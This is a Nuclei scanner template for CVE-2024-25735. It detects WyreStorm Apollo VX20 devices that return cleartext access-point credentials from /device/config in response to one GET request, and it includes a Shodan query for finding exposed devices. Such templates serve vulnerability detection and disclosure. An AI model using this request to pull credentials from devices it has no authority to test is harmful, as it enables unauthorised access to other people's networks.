47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: CVE-2024-25735
|
|
|
|
info:
|
|
name: WyreStorm Apollo VX20 - Information Disclosure
|
|
author: johnk3r
|
|
severity: high
|
|
description: |
|
|
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
|
|
reference:
|
|
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
|
|
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
|
|
- http://packetstormsecurity.com/files/177082
|
|
- https://hyp3rlinx.altervista.org
|
|
- https://github.com/codeb0ss/CVE-2024-25735-PoC
|
|
classification:
|
|
epss-score: 0.00381
|
|
epss-percentile: 0.72907
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wyrestorm
|
|
product: apollo vx20
|
|
shodan-query: ssl:"WyreStorm Apollo VX20"
|
|
tags: packetstorm,cve,cve2024,wyrestorm,info-leak
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/device/config"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"password":'
|
|
- '"softAp":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210094aa267e9fcefa3b5cf6035541b466cd9772aa5cfe6735980c1bd6d4f2c481d9022100c63d8c195e067f627d83b89909d50cb22d9b5f1c25edc5d8fb8edad4d04458cb:922c64590222798bb761d5b6d8e72950 |